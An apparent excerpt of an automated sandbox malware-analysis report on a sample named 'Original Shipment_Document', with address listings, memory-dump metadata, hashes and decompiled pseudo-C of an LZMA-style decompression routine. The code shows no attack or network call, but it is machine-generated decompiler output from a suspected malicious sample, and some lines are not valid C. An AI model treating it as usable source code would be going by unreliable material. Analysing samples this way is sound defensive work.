                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x0040726d
                                                0x0040726a
                                                0x00000000
                                                0x00406fbf

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                                                • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406F07() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
